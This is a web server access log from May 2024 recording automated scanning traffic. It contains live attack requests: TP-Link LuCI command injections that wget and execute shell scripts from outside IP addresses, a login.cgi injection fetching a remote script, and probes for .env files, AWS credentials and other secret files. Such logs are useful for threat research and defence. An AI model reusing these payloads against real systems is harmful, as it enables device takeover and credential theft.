191.96.207.173 - - [05/May/2024:04:15:10 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "GET /frontend_dev.php/$ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "GET /debug/default/view.html HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "GET /debug/default/view HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /frontend/web/debug/default/view HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /web/debug/default/view HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /sapi/debug/default/view HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /AwsConfig.json HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /awsconfig.json HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /aws.json HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /conf.json HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /env.json HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /.json HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /smtp.json HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /db.json HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /sendgrid.json HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /ws-config.json HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /_wpeprivate/config.json HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /deployment-config.json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /sftp-config.json HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:11 +0200] "GET /db/robomongo.json HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /robomongo.json HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /client_secrets.json HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /user-config.json HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /ssh-config.json HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /database-config.json HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /config/default.json HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /config/config.json HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /credentials/config.json HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /app/config/parameters.yml HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /config/parameters.yml HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /parameters.yml HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:12 +0200] "GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php HTTP/1.1" 404 381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:17 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:18 +0200] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
185.16.38.111 - - [05/May/2024:04:16:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
157.230.20.70 - - [05/May/2024:04:21:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
157.230.20.70 - - [05/May/2024:04:21:10 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
157.230.20.70 - - [05/May/2024:04:21:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
157.230.20.70 - - [05/May/2024:04:21:10 +0200] "GET /odinhttpcall1714875649 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
157.230.20.70 - - [05/May/2024:04:21:10 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
157.230.20.70 - - [05/May/2024:04:21:10 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
157.230.20.70 - - [05/May/2024:04:21:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
157.230.20.70 - - [05/May/2024:04:21:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
157.230.23.132 - - [05/May/2024:04:21:11 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
209.38.210.197 - - [05/May/2024:04:21:11 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
138.197.179.92 - - [05/May/2024:04:21:11 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
94.156.79.234 - - [05/May/2024:04:22:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G935U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
194.48.251.3 - - [05/May/2024:04:22:58 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
194.48.251.3 - - [05/May/2024:04:22:59 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.227.254.8 - - [05/May/2024:04:24:17 +0200] "\x03" 501 316 "-" "-"
80.87.206.105 - - [05/May/2024:04:24:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0"
185.224.128.43 - - [05/May/2024:04:24:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.255.167.250 - - [05/May/2024:04:27:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
80.13.152.201 - - [05/May/2024:04:31:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
185.180.140.6 - - [05/May/2024:04:32:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.224.128.43 - - [05/May/2024:04:33:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.77.127.183 - - [05/May/2024:04:33:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
179.43.188.106 - - [05/May/2024:04:34:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.13.152.201 - - [05/May/2024:04:34:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
80.13.152.201 - - [05/May/2024:04:34:32 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
34.38.151.7 - - [05/May/2024:04:35:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
80.13.152.201 - - [05/May/2024:04:36:05 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
34.140.58.13 - - [05/May/2024:04:37:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
80.13.152.201 - - [05/May/2024:04:37:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
185.224.128.43 - - [05/May/2024:04:37:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.255.167.250 - - [05/May/2024:04:38:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
80.13.152.201 - - [05/May/2024:04:39:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
80.13.152.201 - - [05/May/2024:04:40:37 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
179.43.188.106 - - [05/May/2024:04:42:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.43 - - [05/May/2024:04:42:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.145.97 - - [05/May/2024:04:42:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.97 - - [05/May/2024:04:42:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.97 - - [05/May/2024:04:42:54 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.97 - - [05/May/2024:04:42:54 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.224.128.43 - - [05/May/2024:04:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.255.167.250 - - [05/May/2024:04:44:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
35.203.211.188 - - [05/May/2024:04:47:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.240.205.34 - - [05/May/2024:04:48:05 +0200] "Gh0st\xad" 501 321 "-" "-"
179.43.188.106 - - [05/May/2024:04:48:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.43 - - [05/May/2024:04:48:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.188.106 - - [05/May/2024:04:51:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.188.106 - - [05/May/2024:04:52:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.43 - - [05/May/2024:04:52:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
84.54.51.41 - - [05/May/2024:04:53:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
64.62.197.44 - - [05/May/2024:04:53:40 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.62.156.28 - - [05/May/2024:04:53:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
65.49.20.66 - - [05/May/2024:04:54:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
184.105.139.70 - - [05/May/2024:04:54:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
37.139.5.66 - - [05/May/2024:04:54:52 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
168.76.20.229 - - [05/May/2024:04:55:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36"
141.255.167.250 - - [05/May/2024:04:58:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
179.43.188.106 - - [05/May/2024:04:58:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
207.154.235.134 - - [05/May/2024:05:06:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
207.154.235.134 - - [05/May/2024:05:06:20 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
207.154.235.134 - - [05/May/2024:05:06:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
207.154.235.134 - - [05/May/2024:05:06:20 +0200] "GET /odinhttpcall1714878359 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
207.154.235.134 - - [05/May/2024:05:06:20 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
207.154.235.134 - - [05/May/2024:05:06:20 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
207.154.235.134 - - [05/May/2024:05:06:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
207.154.235.134 - - [05/May/2024:05:06:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
68.183.75.115 - - [05/May/2024:05:06:21 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
138.197.179.92 - - [05/May/2024:05:06:21 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
64.226.73.203 - - [05/May/2024:05:06:21 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
185.16.38.111 - - [05/May/2024:05:08:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.255.167.250 - - [05/May/2024:05:08:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
179.43.188.106 - - [05/May/2024:05:08:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.255.167.250 - - [05/May/2024:05:09:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
141.255.167.250 - - [05/May/2024:05:10:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
179.43.188.106 - - [05/May/2024:05:10:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.255.167.250 - - [05/May/2024:05:11:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.16.38.111 - - [05/May/2024:05:12:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
165.227.111.8 - - [05/May/2024:05:16:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.111.8 - - [05/May/2024:05:16:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC 2PXH3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36"
141.255.167.250 - - [05/May/2024:05:21:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.16.38.111 - - [05/May/2024:05:22:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
78.153.140.179 - - [05/May/2024:05:26:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.179 - - [05/May/2024:05:26:15 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
94.156.79.234 - - [05/May/2024:05:26:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; Moto Z3 Play) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
205.210.31.180 - - [05/May/2024:05:31:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.180 - - [05/May/2024:05:31:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.255.167.250 - - [05/May/2024:05:35:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
84.54.51.41 - - [05/May/2024:05:38:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
35.203.211.27 - - [05/May/2024:05:43:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
78.153.140.177 - - [05/May/2024:06:03:57 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.177 - - [05/May/2024:06:03:57 +0200] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
185.16.38.111 - - [05/May/2024:06:08:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
157.245.47.62 - - [05/May/2024:06:08:54 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
157.245.47.62 - - [05/May/2024:06:08:58 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
87.121.69.52 - - [05/May/2024:06:10:18 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
165.227.111.8 - - [05/May/2024:06:11:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.111.8 - - [05/May/2024:06:11:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; moto g(6) plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
87.121.69.52 - - [05/May/2024:06:11:36 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [05/May/2024:06:12:59 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [05/May/2024:06:16:23 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
157.245.47.62 - - [05/May/2024:06:16:43 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
157.245.47.62 - - [05/May/2024:06:16:44 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
